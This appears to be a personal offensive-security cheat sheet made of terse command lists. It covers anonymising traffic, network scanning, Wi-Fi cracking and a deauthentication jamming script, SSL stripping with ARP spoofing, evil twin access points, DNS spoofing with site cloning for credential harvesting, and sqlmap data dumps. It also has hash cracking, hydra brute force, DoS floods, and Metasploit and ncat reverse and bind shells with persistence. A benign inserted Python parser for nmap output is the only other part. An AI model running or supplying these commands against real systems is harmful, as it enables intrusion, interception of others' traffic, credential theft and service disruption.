- Sites:
- nmap.org
- exploit-db.com
- TOR
- apt-get install tor -y
- adduser anon
- nano /etc/proxychains.conf
- USE SOCKS5
- uncomment dynamic_chain
- get root (su)
- add "socks5 127.0.0.1 9050" to end of the file
- service tor status
- service tor start
- proxychains firefox www.duckduckgo.com
- check dns leak
- proxychains nmap
- VPN
- cat /etc/resolv.conf
- nano /etc/dhcp/dhclient.conf
- change "#prepend domain-name-servers 127.0.0.1;"
- to the OpenDNS addresses, separated by a comma
- service network-manager restart
- cat /etc/resolv.conf
- disable WebRTC
- about:config in iceweasel
- change media.peerconnection.enabled to false and restart
- www.vpnbook.com (download software and get username and password)
- unzip VPNBook*.zip
- openvpn vpnbook*.ovpn
- www.dnsleaktest.com
- Macchanger
- macchanger -s eth0
- macchanger -r eth0
- macchanger -p eth0
- MAC_Change.sh (chmod +x)
- [
- #!/bin/bash
- ifconfig eth0 down
- sleep 2
- macchanger -r eth0
- sleep 2
- ifconfig eth0 up
- ]
- crontab -e (@reboot /path/MAC_Change.sh)
- Nmap (Zenmap)
- Test: http://scanme.nmap.org/
- nslookup [site or IP address]
- curl ipinfo.io/[IP address]
- nmap scanme.nmap.org -vv
- nmap -oG - 192.168.1.0-255 -p 22 -vv > /home/SCAN
- cat SCAN | grep Up | awk -F " " '{print $2}' > SCAN2
- nmap -iL SCAN2 -vv
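The grep/awk pipeline above picks hosts out of the grepable (-oG) scan file by column position. As an added example (not part of the original paste), the parser below reads the -oG format properly, so it can pull out both the hosts that are up and the hosts with a given port open; the sample output is constructed, not a real scan.

```python
import re

# Constructed sample of nmap grepable (-oG) output, as "nmap -oG - -p 22 192.168.1.0-255"
# would print it; this is not real scan data.
SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -oG - -p 22 192.168.1.0-255
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///
Host: 192.168.1.2 ()\tStatus: Up
Host: 192.168.1.2 ()\tPorts: 22/closed/tcp//ssh///
Host: 192.168.1.3 ()\tStatus: Down
# Nmap done at Mon Jan  1 12:00:05 2024 -- 256 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

# "Host: <ip> (<hostname>)<tab><field>: <value>[<tab><field>: <value>...]"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+(.*)$")


def parse_grepable(text):
    """Return {ip: {"status": "Up"/"Down"/None, "open": [port, ...]}} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything that is not a Host record
        ip, _hostname, rest = m.groups()
        entry = hosts.setdefault(ip, {"status": None, "open": []})
        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["status"] = value.strip()
            elif key == "Ports":
                # each port is "port/state/proto/owner/service/rpc/version/"
                for port in value.split(","):
                    parts = port.strip().split("/")
                    if len(parts) >= 2 and parts[1] == "open":
                        entry["open"].append(int(parts[0]))
    return hosts


def hosts_up(text):
    """Addresses reported as Up, sorted; the equivalent of the grep/awk step."""
    return sorted(ip for ip, e in parse_grepable(text).items() if e["status"] == "Up")


def hosts_with_open_port(text, port):
    """Addresses with the given TCP port open, e.g. to feed into a second nmap -iL run."""
    return sorted(ip for ip, e in parse_grepable(text).items() if port in e["open"])
```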
- Reaver
- Download from Google Code and extract the gzip
- tar -zxvf file.tar.gz -C /path/to/directory
- {
- -z : Work on gzip compression automatically when reading archives.
- -x : Extract archives.
- -v : Produce verbose output i.e. display progress and extracted file list on screen.
- -f : Read the archive from the specified file (file.tar.gz in this example).
- -t : List the files in the archive.
- }
- ./configure
- make
- make install
- Get the Crunch wordlist generator from SourceForge and extract it
- make
- make install
- Install USB wireless adapter with VirtualBox extension pack
- iwlist wlan0 scan | grep ESSID
- monitor.sh (chmod +x)
- [
- #!/bin/bash
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- macchanger wlan0 -r
- ]
- airmon-ng check wlan0
- kill NetworkManager, then dhclient, then the other listed processes
- airodump-ng wlan0
- airodump-ng -c [channel #] -w SCAN_DUMP --bssid [MAC address] wlan0
- For WEP
- {
- At same time: aireplay-ng -1 0 -a [MAC address] wlan0
- aireplay-ng -3 -b [MAC address] wlan0
- aircrack-ng SCAN_DUMP
- }
- At same time: aireplay-ng -0 0 -a [MAC address] wlan0
- Ctrl-C
- crunch [min-length] [max-length] -t [pattern] -f charset.lst | aircrack-ng -w - SCAN_DUMP -e [ESSID]
- wash -i wlan0
- reaver -b [MAC address] -i wlan0 -c [channel #] -r [# tries]:[per secs] -vv
- Wireless DNS Jamming
- ./monitor.sh
- airmon-ng check wlan0 (kill processes)
- airodump-ng wlan0
- iwconfig wlan0 channel [#]
- aireplay-ng -0 0 -a [MAC address] wlan0
- jam.sh (chmod +x)
- [
- #!/bin/bash
- while true
- do
- aireplay-ng -0 5 -a [MAC address] wlan0  # optionally add "-c [MAC address]" for a client
- iwconfig wlan0 channel [#]
- ifconfig wlan0 down
- macchanger -r wlan0 | grep "New MAC"
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- iwconfig wlan0 | grep Mode
- sleep 3
- echo Waiting!
- done
- ]
- Monitor with: airodump-ng -c [channel #] --bssid [MAC address] wlan0
- SSL Strip
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port 8080
- iptables -t nat -L PREROUTING
- Find target (nmap 192.168.1.2-254 -vv)
- arpspoof -i wlan0 -t [gateway ip] -r [target ip]
- At same time: iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
- At same time: sslstrip -l 8080
- At same time: tail -f sslstrip.log
- SQUID
- apt-get install imagemagick ghostscript jp2a apache2 squid3
- Download SQUID scripts
- nano /etc/squid3/squid.conf
- Uncomment: acl localnet src 192.168.0.0/16 (or local network)
- Uncomment: http_access allow localnet
- Modify to: http_port 3128 transparent
- Add to bottom: url_rewrite_program [path]/[script.pl]
- service squid3 restart
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
- mkdir /var/www/tmp
- chmod 777 /var/www/tmp
- service httpd restart
- service apache2 restart
- arpspoof -i wlan0 -t [gateway ip] -r [target ip]
- Evil Twin
- Enter monitor mode and kill processes
- apt-get install bridge-utils wireshark
- airodump-ng wlan0
- airbase-ng -a [clone MAC address] --essid "Something" -c 6 wlan0
- aireplay-ng -0 0 -a [clone MAC address] wlan0
- brctl addbr evil
- brctl addif evil wlan0
- brctl addif evil at0
- ifconfig at0 0.0.0.0 up
- ifconfig evil up
- dhclient3 evil
- Listen to evil with wireshark
- Router Vulnerability
- Example:
- nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/tmp/ath0.ap_bss -d -n -Pn IPList
- DNS Post Authentication Exploit
- dnschef --fakeip=192.168.1.102 --fakedomains=randomName.com --interface=192.168.1.102
- setoolkit (1->2->3->2) site cloner
- nslookup [site you want to clone]
- cd /var/www
- tail -f harvester_file.txt
- SQL Injection
- Download DVWA (www.dvwa.co.uk)
- Copy the DVWA folder to clean /var/www/
- chmod -Rv 777 /var/www/DVWA*
- apt-cache search mysql | grep -i database | less
- apt-get install mysql-client mysql-server
- service mysql start
- service mysql restart
- mysql -h localhost -u root
- SET PASSWORD FOR root@localhost=PASSWORD('test');
- mysql -h localhost -u root -p
- nano /var/www/DVWA*/config.inc.php (change the password setting)
- service mysql status
- service apache2 restart
- Go to localhost in browser (user: admin password: password)
- burpsuite (turn on intercept)
- Set manual proxy in browser to HTTP: 127.0.0.1 Port: 8080
- Get PHPSESSID
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" --dbs
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -D dvwa --tables
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -D dvwa -T users --columns
- sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -C first_name,last_name,user,password users --dump
- Crack the dumped password hashes (see Cracking Hashes below)
- Cracking Hashes
- findmyhash MD5 -h [hash code]
- Change "ro" to "rw" and add "init=/bin/bash" to the end of the GRUB boot line
- unshadow /etc/passwd /etc/shadow > pass
- john pass
- For Windows:
- Get pwdump7 from openwall.com
- pwdump7.exe > pass
- john pass
- john --show pass
- Hydra:
- Get name fields from HTML login form
- hydra -l user -P passlist.txt [server IP] http-post-form "[rest of URL path]:[username field]=^USER^&[password field]=^PASS^&Login=Login:[fail message]" -V
- Can also use hydra-gtk GUI
- DoS Demonstration
- hping3 -i u100 -S -p 80 [IP address]
- nmap --script http-slowloris --max-parallelism 400 [IP address] -vv
- ./slowloris.pl -dns [IP address] -port 80 -num 500
- Reverse Shells
- service postgresql start
- service metasploit start
- msfupdate
- msfconsole
- In console: msfpayload windows/meterpreter/reverse_tcp LHOST=[IP address] X > /root/Desktop/CMD.exe
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST [IP address]
- set LPORT [Port #]
- exploit
- help
- shell
- background
- sessions -l
- sessions -i [#]
- use post/windows/escalate
- use exploit/windows/local/ask
- show options
- set session [#]
- exploit
- getsystem
- run persistence -X
- ncat -v -l -p [port] -e /bin/bash &
- Also: ncat -v -l -n -p [port] -e cmd.exe
- Other machine: ncat [IP address] [port]
- nmap localhost
- lsof -i :[port]
- kill processes using port
- ncat --ssl -l -p [port]
- Other machine: ncat --ssl [IP address] [port]
- Download php-reverse-shell
- Rename, change IP and upload
- Rename and forward in burpsuite
- ncat -v -l -p [port]
- etc...